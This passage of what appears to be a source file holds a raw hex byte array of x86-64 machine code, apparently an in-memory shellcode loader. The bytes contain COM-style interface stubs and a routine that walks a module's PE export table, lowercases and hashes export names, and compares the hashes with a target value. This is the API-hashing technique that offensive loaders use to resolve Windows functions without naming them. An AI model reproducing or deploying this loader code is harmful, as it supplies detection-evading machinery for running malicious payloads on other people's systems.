872 | 0xd0, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x18, 0x89, 0x10, 0xb8, 0x00, 0x00, | |
873 | 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, | |
874 | 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, | |
875 | 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, | |
876 | 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0xb8, 0x00, 0x00, 0x00, 0x00, | |
877 | 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, | |
878 | 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, | |
879 | 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, | |
880 | 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, | |
881 | 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, | |
882 | 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, | |
883 | 0x00, 0x48, 0x8d, 0x15, 0xb2, 0x02, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, | |
884 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x5d, 0x03, 0x00, | |
885 | 0x00, 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
886 | 0x48, 0x8d, 0x15, 0x7d, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, | |
887 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa4, 0x03, 0x00, | |
888 | 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
889 | 0x48, 0x8d, 0x15, 0xbd, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, | |
890 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x06, 0x04, 0x00, | |
891 | 0x00, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
892 | 0x48, 0x8d, 0x15, 0x37, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, | |
893 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x99, 0x04, 0x00, | |
894 | 0x00, 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
895 | 0x48, 0x8d, 0x15, 0x9a, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, | |
896 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9b, 0x04, 0x00, | |
897 | 0x00, 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
898 | 0x48, 0x8d, 0x15, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, | |
899 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9d, 0x04, 0x00, | |
900 | 0x00, 0x48, 0x89, 0x50, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
901 | 0x48, 0x8d, 0x15, 0x9e, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x60, 0x48, | |
902 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa1, 0x04, 0x00, | |
903 | 0x00, 0x48, 0x89, 0x50, 0x68, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
904 | 0x48, 0x8d, 0x15, 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x70, 0x48, | |
905 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00, | |
906 | 0x00, 0x48, 0x89, 0x50, 0x78, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
907 | 0x48, 0x8d, 0x15, 0xd5, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x80, 0x00, | |
908 | 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, | |
909 | 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48, | |
910 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd1, 0x04, 0x00, | |
911 | 0x00, 0x48, 0x89, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, | |
912 | 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xcf, 0x04, 0x00, 0x00, 0x48, 0x89, | |
913 | 0x90, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
914 | 0x48, 0x8d, 0x15, 0xcd, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa0, 0x00, | |
915 | 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, | |
916 | 0xca, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa8, 0x00, 0x00, 0x00, 0x48, | |
917 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd0, 0x04, 0x00, | |
918 | 0x00, 0x48, 0x89, 0x90, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, | |
919 | 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xce, 0x04, 0x00, 0x00, 0x48, 0x89, | |
920 | 0x90, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
921 | 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc0, 0x00, | |
922 | 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, | |
923 | 0xd2, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc8, 0x00, 0x00, 0x00, 0x48, | |
924 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00, | |
925 | 0x00, 0x48, 0x89, 0x90, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, | |
926 | 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xec, 0x04, 0x00, 0x00, 0x48, 0x89, | |
927 | 0x90, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, | |
928 | 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe0, 0x00, | |
929 | 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, | |
930 | 0xe8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe8, 0x00, 0x00, 0x00, 0x48, | |
931 | 0x8b, 0x45, 0x18, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
932 | 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, | |
933 | 0x45, 0x10, 0x48, 0x8b, 0x80, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, | |
934 | 0x18, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1, | |
935 | 0xdc, 0x03, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xfc, | |
936 | 0x00, 0x75, 0x32, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, | |
937 | 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d, | |
938 | 0x42, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x8a, 0x8c, 0x04, 0x00, | |
939 | 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c, 0x89, 0xca, | |
940 | 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x30, | |
941 | 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, | |
942 | 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x83, | |
943 | 0x7d, 0x20, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xe9, 0x91, | |
944 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28, 0x48, | |
945 | 0x8d, 0x88, 0xfc, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, | |
946 | 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xd4, 0x0d, 0x00, 0x00, | |
947 | 0x85, 0xc0, 0x74, 0x4a, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28, | |
948 | 0x48, 0x8d, 0x88, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, | |
949 | 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xaf, 0x0d, 0x00, | |
950 | 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, | |
951 | 0x28, 0x48, 0x8d, 0x88, 0x8c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, | |
952 | 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x8a, 0x0d, | |
953 | 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, | |
954 | 0x55, 0x10, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x10, | |
955 | 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, | |
956 | 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, | |
957 | 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, | |
958 | 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, | |
959 | 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48, | |
960 | 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x20, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, | |
961 | 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, | |
962 | 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf0, | |
963 | 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, | |
964 | 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xfc, | |
965 | 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, | |
966 | 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x83, 0x7d, | |
967 | 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x0f, 0x48, | |
968 | 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, | |
969 | 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, | |
970 | 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, | |
971 | 0x89, 0x4d, 0x28, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07, 0xb8, 0x03, | |
972 | 0x40, 0x00, 0x80, 0xeb, 0x30, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, | |
973 | 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0x10, | |
974 | 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, | |
975 | 0x10, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10, | |
976 | 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, | |
977 | 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, | |
978 | 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48, | |
979 | 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
980 | 0x40, 0x50, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x10, 0x4c, 0x8b, | |
981 | 0x4d, 0x38, 0x44, 0x8b, 0x45, 0x28, 0x48, 0x8b, 0x55, 0x20, 0xff, 0xd0, | |
982 | 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, | |
983 | 0xec, 0x60, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, | |
984 | 0x20, 0x44, 0x89, 0x4d, 0x28, 0x8b, 0x45, 0x30, 0x66, 0x89, 0x45, 0xec, | |
985 | 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, | |
986 | 0x8b, 0x40, 0x58, 0x44, 0x0f, 0xb7, 0x4d, 0xec, 0x48, 0x8b, 0x55, 0x10, | |
987 | 0x48, 0x8b, 0x4a, 0x10, 0x44, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x50, | |
988 | 0x48, 0x89, 0x54, 0x24, 0x38, 0x48, 0x8b, 0x55, 0x48, 0x48, 0x89, 0x54, | |
989 | 0x24, 0x30, 0x48, 0x8b, 0x55, 0x40, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, | |
990 | 0x8b, 0x55, 0x38, 0x48, 0x89, 0x54, 0x24, 0x20, 0x48, 0x8b, 0x55, 0x10, | |
991 | 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x60, | |
992 | 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, | |
993 | 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, | |
994 | 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, | |
995 | 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, | |
996 | 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, | |
997 | 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, | |
998 | 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, | |
999 | 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, | |
1000 | 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0xd0, 0x66, | |
1001 | 0x89, 0x45, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, | |
1002 | 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, | |
1003 | 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, | |
1004 | 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x18, | |
1005 | 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, | |
1006 | 0xba, 0xfd, 0xff, 0xff, 0xff, 0xff, 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00, | |
1007 | 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, | |
1008 | 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, | |
1009 | 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, | |
1010 | 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, | |
1011 | 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, | |
1012 | 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, | |
1013 | 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, | |
1014 | 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, | |
1015 | 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, | |
1016 | 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, | |
1017 | 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8, | |
1018 | 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, | |
1019 | 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, | |
1020 | 0x4d, 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, | |
1021 | 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, | |
1022 | 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, | |
1023 | 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, | |
1024 | 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, | |
1025 | 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, | |
1026 | 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, | |
1027 | 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, | |
1028 | 0x28, 0x48, 0x8b, 0x40, 0x68, 0x8b, 0x55, 0x18, 0x89, 0xd1, 0xff, 0xd0, | |
1029 | 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, | |
1030 | 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, | |
1031 | 0x89, 0x45, 0x20, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, | |
1032 | 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, | |
1033 | 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, | |
1034 | 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, | |
1035 | 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, | |
1036 | 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x60, | |
1037 | 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, | |
1038 | 0x89, 0x8d, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0xf8, 0x01, 0x00, | |
1039 | 0x00, 0x4c, 0x89, 0x85, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x8d, 0x08, | |
1040 | 0x02, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x00, | |
1041 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, | |
1042 | 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x8b, | |
1043 | 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, | |
1044 | 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
1045 | 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x88, 0x00, 0x00, 0x00, 0x48, | |
1046 | 0x89, 0x85, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00, | |
1047 | 0x00, 0x8b, 0x00, 0x89, 0x85, 0xb4, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xb4, | |
1048 | 0x01, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, | |
1049 | 0x9c, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xb4, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
1050 | 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8, | |
1051 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, | |
1052 | 0x18, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xd8, 0x01, 0x00, | |
1053 | 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x62, 0x03, | |
1054 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x1c, | |
1055 | 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, | |
1056 | 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, | |
1057 | 0x00, 0x00, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, | |
1058 | 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x01, 0x00, 0x00, | |
1059 | 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, | |
1060 | 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, | |
1061 | 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, | |
1062 | 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, | |
1063 | 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x88, 0x01, 0x00, 0x00, 0xc7, 0x85, | |
1064 | 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x29, 0x8b, 0x95, | |
1065 | 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, | |
1066 | 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x8b, 0x85, | |
1067 | 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x60, 0x83, 0x85, 0xdc, 0x01, | |
1068 | 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
1069 | 0x88, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, | |
1070 | 0x75, 0xc0, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0x60, | |
1071 | 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x60, | |
1072 | 0x48, 0x89, 0xc1, 0xe8, 0x1d, 0x09, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, | |
1073 | 0x01, 0x00, 0x00, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, | |
1074 | 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
1075 | 0x85, 0x98, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, | |
1076 | 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, | |
1077 | 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, | |
1078 | 0x48, 0x8b, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xce, | |
1079 | 0x08, 0x00, 0x00, 0x48, 0x33, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x3b, | |
1080 | 0x85, 0x00, 0x02, 0x00, 0x00, 0x0f, 0x85, 0xfc, 0x01, 0x00, 0x00, 0x8b, | |
1081 | 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, | |
1082 | 0x14, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, | |
1083 | 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, | |
1084 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, | |
1085 | 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, | |
1086 | 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
